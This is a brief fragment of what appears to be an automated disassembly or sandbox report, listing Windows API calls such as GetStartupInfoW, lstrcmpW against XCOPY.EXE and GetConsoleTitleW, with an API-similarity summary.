                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019458: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 0001955D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019458: lstrcmpW.KERNELBASE(00000000,\XCOPY.EXE), ref: 000195B8
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,00007FE7), ref: 00022140
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$AttributeConsoleHeapProcThreadTitle$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 388403260-0